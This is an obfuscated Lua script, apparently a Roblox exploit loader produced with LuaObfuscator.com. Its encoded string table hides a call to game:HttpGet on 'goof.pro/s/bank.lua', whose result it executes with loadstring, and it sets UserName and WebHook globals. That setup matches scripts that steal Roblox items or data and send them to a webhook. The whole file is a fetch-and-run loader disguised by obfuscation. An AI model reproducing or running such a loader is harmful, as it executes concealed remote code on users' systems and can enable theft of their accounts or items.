--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=0;local v85;while true do if (v84==(927 -((1091 -(282 + 595)) + 713))) then v85=2^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=(1605 + 32) -(1523 + 114) ;local v36;local v37;while true do if (v35==(1271 -(226 + 1044))) then return (v37 * (1114 -858)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -(166694 -75893))) + (v39 * (472 -216)) + v38 ;end local function v24()local v42=350 -(87 + (1011 -748)) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(183 -(67 + (555 -(416 + 26))))) then if (v47==(0 + 0)) then if (v46==((0 -0) -0)) then return v48 * (0 + 0) ;else v47=3 -2 ;v45=0;end elseif (v47==(2999 -(802 + 150))) then return ((v46==0) and (v48 * ((1 + 0)/0))) or (v48 * NaN) ;end return v8(v48,v47-(2753 -1730) ) * (v45 + (v46/(((4 -1) -1)^(38 + 14)))) ;end if (v42==(997 -(915 + 82))) then v43=v23();v44=v23();v42=1;end if (v42==(5 -3)) then v47=v20(v44,13 + 8 ,40 -9 );v48=((v20(v44,1219 -(1069 + (556 -(145 + 293))) )==1) and  -1) or (2 -1) ;v42=3;end if (v42==(1 -0)) then v45=(431 -(44 + 386)) + (1486 -(998 + 488)) ;v46=(v20(v44,1 -0 ,20 + 0 ) * ((793 -(117 + 251 + 347 + 76))^(100 -68))) + v43 ;v42=20 -(10 + 8) ;end end end local function v25(v49)local v50;if  not v49 then local v86=772 -(201 + 571) ;while true do if (v86==(1138 -(116 + 1022))) then v49=v23();if (v49==(0 -(0 -0))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v65=3 -2 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=0 -0 ;while true do if (v67==1) then if (v52==(0 -0)) then v53={};v54={};v55={};v52=1;end if (v52==(1 + 1)) then for v98=1,v57 do local v99=0;local v100;local v101;while true do if (v99==0) then local v106=0;while true do if (v106~=0) then else v100=v21();v101=nil;v106=1 -0 ;end if (v106==(1 + 0)) then v99=1475 -(1329 + 145) ;break;end end end if (v99==(972 -(140 + 831))) then if (v100==1) then v101=v21()~=(1850 -(1409 + 441)) ;elseif (v100==(720 -(15 + 703))) then v101=v24();elseif (v100~=(2 + 1)) then else v101=v25();end v58[v98]=v101;break;end end end v56[3]=v21();for v102=439 -(262 + 176) ,v23() do local v103=0;local v104;local v105;while true do if (v103~=(1722 -(345 + 1376))) then else while true do if (v104~=(688 -(198 + 490))) then else v105=v21();if (v20(v105,4 -3 ,2 -1 )==(1206 -(696 + 510))) then local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==(3 -1)) then while true do if (1~=v128) then else local v177=1262 -(1091 + 171) ;while true do if (v177==0) then v131={v22(),v22(),nil,nil};if (v129==0) then local v185=0;local v186;while true do if (v185==0) then v186=0;while true do if (v186==(374 -(123 + 251))) then v131[3]=v22();v131[4]=v22();break;end end break;end end elseif (v129==(4 -3)) then v131[3]=v23();elseif (v129==(700 -(208 + 490))) then v131[3]=v23() -((1 + 1)^(8 + 8)) ;elseif (v129==(839 -(660 + 176))) then local v191=0 + 0 ;local v192;local v193;while true do if (v191==(203 -(14 + 188))) then while true do if (v192~=0) then else v193=675 -(534 + 141) ;while true do if (v193~=(0 + 0)) then else v131[3 + 0 ]=v23() -(2^(16 + 0)) ;v131[4]=v22();break;end end break;end end break;end if (v191==(0 -0)) then v192=0 -0 ;v193=nil;v191=1;end end end v177=2 -1 ;end if (v177==1) then v128=2;break;end end end if (v128~=0) then else v129=v20(v105,2,2 + 1 );v130=v20(v105,4,6);v128=1;end if (v128==2) then if (v20(v130,1,1 + 0 )~=1) then else v131[2]=v58[v131[398 -(115 + 281) ]];end if (v20(v130,4 -2 ,2 + 0 )==1) then v131[7 -4 ]=v58[v131[3]];end v128=3;end if (v128~=(10 -7)) then else if (v20(v130,870 -(550 + 317) ,3 -0 )==(1 -0)) then v131[11 -7 ]=v58[v131[289 -(134 + 151) ]];end v53[v102]=v131;break;end end break;end if (v127~=(1666 -(970 + 695))) then else local v166=0;while true do if (v166==(1 -0)) then v127=2;break;end if (v166==(1990 -(582 + 1408))) then v130=nil;v131=nil;v166=3 -2 ;end end end if (v127==0) then local v167=0 -0 ;while true do if (v167==(0 -0)) then v128=0;v129=nil;v167=1;end if (v167==(1825 -(1195 + 629))) then v127=1;break;end end end end end break;end end break;end if (v103~=0) then else v104=0;v105=nil;v103=1 -0 ;end end end v52=3;end break;end if (v67==0) then if (v52~=(242 -(187 + 54))) then else v56={v53,v54,nil,v55};v57=v23();v58={};v52=2 + 0 ;end if (v52==(6 -3)) then local v97=0 -0 ;while true do if ((0 + 0)==v97) then for v108=1,v23() do v54[v108-(1637 -(1373 + 263)) ]=v28();end return v56;end end end v67=1001 -(451 + 549) ;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end if (v88==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v110=0;local v111;local v112;while true do if (1==v110) then v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];break;end if (v110==0) then v111=v80[2];v112=v78[v80[3]];v110=1;end end else v61[v80[3]]=v78[v80[2]];end elseif (v81<=2) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==3) then do return;end else v78[v80[2]]=v80[3];end elseif (v81<=7) then if (v81<=5) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>6) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end else v78[v80[2]]();end elseif (v81<=8) then local v115=0;local v116;while true do if (v115==0) then v116=v80[2];v78[v116]=v78[v116](v13(v78,v116 + 1 ,v73));break;end end elseif (v81==9) then v78[v80[2]]();else do return;end end elseif (v81<=15) then if (v81<=12) then if (v81>11) then v72=v80[3];else v78[v80[2]]=v80[3];end elseif (v81<=13) then v72=v80[3];elseif (v81==14) then v78[v80[2]]=v80[3]~=0 ;else local v137=v80[2];local v138,v139=v71(v78[v137](v13(v78,v137 + 1 ,v80[3])));v73=(v139 + v137) -1 ;local v140=0;for v159=v137,v73 do local v160=0;while true do if (v160==0) then v140=v140 + 1 ;v78[v159]=v138[v140];break;end end end end elseif (v81<=18) then if (v81<=16) then local v121=v80[2];local v122,v123=v71(v78[v121](v13(v78,v121 + 1 ,v80[3])));v73=(v123 + v121) -1 ;local v124=0;for v125=v121,v73 do local v126=0;while true do if (v126==0) then v124=v124 + 1 ;v78[v125]=v122[v124];break;end end end elseif (v81==17) then v61[v80[3]]=v78[v80[2]];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=19) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end elseif (v81>20) then local v147=0;local v148;local v149;while true do if (v147==0) then v148=v80[2];v149=v78[v80[3]];v147=1;end if (v147==1) then v78[v148 + 1 ]=v149;v78[v148]=v149[v80[4]];break;end end else local v150=0;local v151;while true do if (v150==0) then v151=v80[2];v78[v151]=v78[v151](v13(v78,v151 + 1 ,v73));break;end end end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F672O6F662E70726F2F732F62616E6B2E6C756103083O00557365724E616D65030A3O00557365436F646542595303073O00576562482O6F6B035O00153O0012043O00013O0026053O000C0001000200040D3O000C0001001213000100033O001213000200043O002015000200020005001204000400064O0012000500014O000F000200054O001400013O00022O000900010001000100040D3O001400010026053O00010001000100040D3O00010001001204000100083O001211000100073O0012040001000A3O001211000100093O0012043O00023O00040D3O000100012O00033O00017O00",v9(),...);
